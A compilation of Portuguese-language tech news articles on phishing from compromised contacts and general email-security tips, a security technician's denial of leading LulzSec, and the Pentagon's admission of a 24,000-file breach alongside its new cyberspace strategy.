Grande parte dos usuários já sabe que tipos de mensagens devem ser vistas com desconfiança: aquelas supostamente de um
banco, pedindo para que um software seja instalado, ou uma que promete ensinar como ganhar dinheiro fácil. 
No entanto, os e-mails que enganaram recentemente os internautas vieram de amigos, colegas, familiares – que provavelmente tiveram seus computadores invadidos por uma praga. O truque é muito eficaz na hora de convencer pessoas a abrir arquivos que não deveriam. O melhor, portanto, é desconfiar mesmo de conhecidos e, se necessário, questioná-los sobre a mensagem que acabou de receber.
Um phishing após o outro
Pesquisadores afirmam que é muito comum que, uma vez que o usuário tenha caído em um golpe, outra mensagem tente repetir o feito. O detalhe é que esta poderá vir com informações pessoais da vítima, obtidas a partir da armadilha anterior. Ou seja: se você foi enganado a primeira vez, deve ser duas vezes mais cuidadoso para não ser tapeado uma segunda.

A salvo, por enquanto
Os ataques identificados contra os principais serviços de e-mail tinham pessoas específicas como alvos – de autoridades governamentais a ativistas políticas e jornalistas. Os criminosos usaram dados pessoais e códigos desenvolvidos exclusivamente para atingir esses usuários.

Provavelmente, você está a salvo de armadilhas tão bem elaboradas. Em geral os golpes costumam ser simples, no intuito de chegar a muitos usuários e enganar o maior número possível. Mesmo assim, não baixe a guarda e não se convença da legitimidade de um e-mail só porque, de algum modo, ele inclui seu CPF no corpo do texto.
Quando tudo não é o bastante
Em maio, a Trend Micro identificou uma
vulnerabilidade no Hotmail que comprometia a conta do usuário só de ele abrir uma mensagem com código malicioso. Ela, direcionada também a alguns alvos específicos, roubava os e-mails do internauta e seus contatos, enviando, em seguida, a mesma praga para outras contas. A Microsoft já corrigiu a falha, mas só depois que muitos foram atingidos.
No caso do Gmail, os cracker tiraram proveito de uma vulnerabilidade em um protocolo do Windows que analisava o antivírus do usuário. Dessa forma, os criminosos evitaram que o malware fosse identificado, tomando controle da máquina do internauta.
As dicas convencionais ainda valem
Além de usar antivírus e firewall para proteger o computador, a Trend Micro recomenda verificar erros de ortografia para julgar a autenticidade de uma mensagem – as falsas costumam vir com erros crassos. E antes de clicar em um link externo, preste atenção no endereço a que ele te direcionará – os navegadores mostram a informação na barra de status ou de endereço.

Se você suspeitar que sua conta foi corrompida, vá nas configurações do serviço e veja se os e-mails recebidos estão sendo direcionados a terceiros. Se você usar o Gmail, é uma boa habilitar a verificação dupla de login do serviço, que aprimora sua segurança.

Técnico de segurança português nega ser o líder do grupo LulzSec

Hugo Carvalho atribui acusação a um mal entendido. "Não tenho nada a ver com essas atividades", garante.

Apontado como um dos membros do grupo hacker LulzSec – que atacou sites de games, da CIA e do governo brasileiro, entre outros – Hugo Carvalho, técnico de segurança digital em uma operadora portuguesa, nega a acusação. Em entrevista à Computerworld, ele atribuiu a notícia a um desentendimento.
Segundo Carvalho, o domínio que motivou a suspeita (prvt.org) foi vendido por ele em novembro de 2009. Do cliente que o adquiriu, o português só possui um endereço de e-mail (xavier@openplans.com), do qual, apesar das mensagens enviadas, a Computerworld não obteve nenhuma resposta.
O grupo que o acusa de ser dos LulzSec foi contactado por Hugo Carvalho ainda em junho “para mudarem a história, mas ignoraram”, diz. Nessa altura, um grupo já tentava desmascarar o responsável pelo domínio prvt.org, mas sem sucesso.
“Não tenho nada a ver com essas atividades. É pura mentira”, garantiu, acrescentando que já entrou em contato com as autoridades do país para esclarecer a situação. O fato de ter uma empresa de hospedagem com um único servidor é “mera coincidência”, explicou.
Saiba mais: Quem são os grupos hackers e o que eles querem?
O nome do técnico de segurança surgiu como líder do LulzSec por conta das investigações de um grupo anti-hacker. A equipe analisou o domínio suspeito e chegou a vários donos; o último, como divulgado pelos blogs Fester’s Court e The Real Sabu, seria Carvalho.
Segundo ele, porém, a conta no Twitter @anonymouSabu – de onde parte das informações foi tirada – não lhe pertence. “Não conheço nenhum Sabu ou alguém que o conheça”, escreveu em seu blog.
Partiu do perfil em questão, por exemplo, a mensagem, escrita em inglês: “O Governo de Portugal não irá me extraditar”, enviada ao microblogging na última terça-feira (12/07). No dia seguinte, nova atualização. “Ok, vocês me acharam. Eu sou o Hugo. Eu estou em Portugal. A próxima pergunta é: Vocês podem me parar?”.
A confiança do líder do LulzSec, porém, não parece racional. Desde o fim do grupo, tanto o FBI como a polícia inglesa tem aumentado as investigações em busca dos membros que causaram tantos incidentes nos últimos dois meses. Alguns, dizem as últimas notícias, já foram presos.

Em ciberataque, invasores roubam 24 mil arquivos do Pentágono

Ação ocorreu em março, mas foi reconhecida só agora pelo Departamento de Defesa dos EUA; origem teria sido um "Estado-nação" não revelado.

O Departamento de Defesa dos Estados Unidos admitiu ter sido vítima de um ciberataque disparado por um "serviço estrangeiro de inteligência" que resultou no roubo de 24 mil arquivos sigilosos.
O ataque ocorreu em março e foi executado por um "Estado-nação" não revelado, de acordo com o subsecretário de Defesa William J. Lynn III.
Lynn revelou a ocorrência do ataque durante discurso em que descrevia a nova ciberestratégia do Pentágono para lidar com violações de segurança de dados.
O Washington Post informa que os arquivos foram roubados de uma empresa terceirizada. Lynn não revelou o nome do "Estado-nação" envolvido, nem a natureza dos arquivos que foram roubados. A admissão da brecha parece servir mais como justificativa para aplicação da nova "Estratégia de Operações no Ciberespaço" do Departamento de Defesa (que pode ser consultada neste documento PDF).
A nova estratégia, descrita no documento de 19 páginas, apoia-se em cinco "iniciativas estratégicas" ou "objetivos":
1- Tratar o ciberespaço como um "domínio operacional" com forças especialmente organizadas, treinadas e equipadas;
2- Empregar novos conceitos de operação de defesa para proteger as redes e os sistemas do departamento;
3- Trabalhar em parceria com outros departamentos do governo para criar uma estratégia abrangente de cibersegurança;
4- Construir relações com aliados dos EUA e com parceiros internacionais;
5- Recrutar, educar e treinar a "engenhosidade da nação" para ajudar a melhorar a cibersegurança.
Sob as novas diretrizes de cibersegurança, um ciberataque pode ser considerado um ato de guerra e justificar "uma resposta militar proporcional e justificada em hora e lugar escolhidos", disse Lynn.
É claro que, para um ciberataque ser considerado um ato de guerra, deve causar efeitos comparáveis aos de um ato de guerra mais tradicional - danos massivos, perdas humanas massivas ou danos econômicos relevantes.
"Nessas circunstâncias, eu penso que o presidente consideraria utilizar todas as ferramentas de que dispõe - econômicas, políticas e, como último recurso, militares", afirmou Lynn.
Esta não é a primeira vez que se discute a classificação de ciberataques como ato de guerra - de fato, o grupo hacktivista LulzSec é em grande parte resultado das notícias de que o Departamento de Defesa planejaria tomar atitudes mais sérias em relação a ações de hackers. Em uma das primeiras aparições do LulzSec, o grupo alegou ter invadido e pichado o site da filial de Atlanta do InfraGard, uma organização afiliada ao FBI, em resposta ao "aumento das apostas" da OTAN e do presidente dos EUA Barack Obama.

Lynn também ressaltou que, nos últimos anos, "todos os tipos de dados foram roubados", dos mais mundanos aos incrivelmente sigilosos, incluindo "documentos de aviônica, tecnologias de vigilância, sistemas de comunicação por satélites e protocolos de segurança de redes", por "intrusos estrangeiros" que violam as "redes corporativas de empresas do setor de defesa".